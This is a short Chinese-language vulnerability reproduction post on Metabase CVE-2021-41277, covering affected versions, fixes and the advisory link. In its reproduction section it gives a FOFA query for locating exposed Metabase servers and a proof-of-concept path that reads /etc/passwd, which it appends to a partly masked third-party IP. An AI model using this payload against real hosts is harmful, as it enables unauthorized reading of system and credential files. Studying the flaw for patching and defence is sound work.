2-Metabase 信息泄露漏洞(CVE-2021-41277)——漏洞复现
一、漏洞简介
metabase 是一个简单、开源的数据分析平台。
CVE-2021-41277
在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。
该漏洞CVSS评分:9.9,危害等级:严重
二、影响版本
影响版本:
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
修复版本:
metabase version >= 0.40.5
metabase version >= 1.40.5
三、漏洞复现
1、fofa搜索 app="Metabase"
2、POC验证
POC:
/api/geojson?url=file:/etc/passwd
如下图所示,找到一个存在漏洞的网站
在URL后面拼接POC:
101.xxx.xxx.xxx:00/api/geojson?url=file:/etc/passwd
四、漏洞修复
1、参考漏洞影响范围,及时升级至最新安全版本:https://github.com/metabase/metabase
2、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
浙公网安备 33010602011771号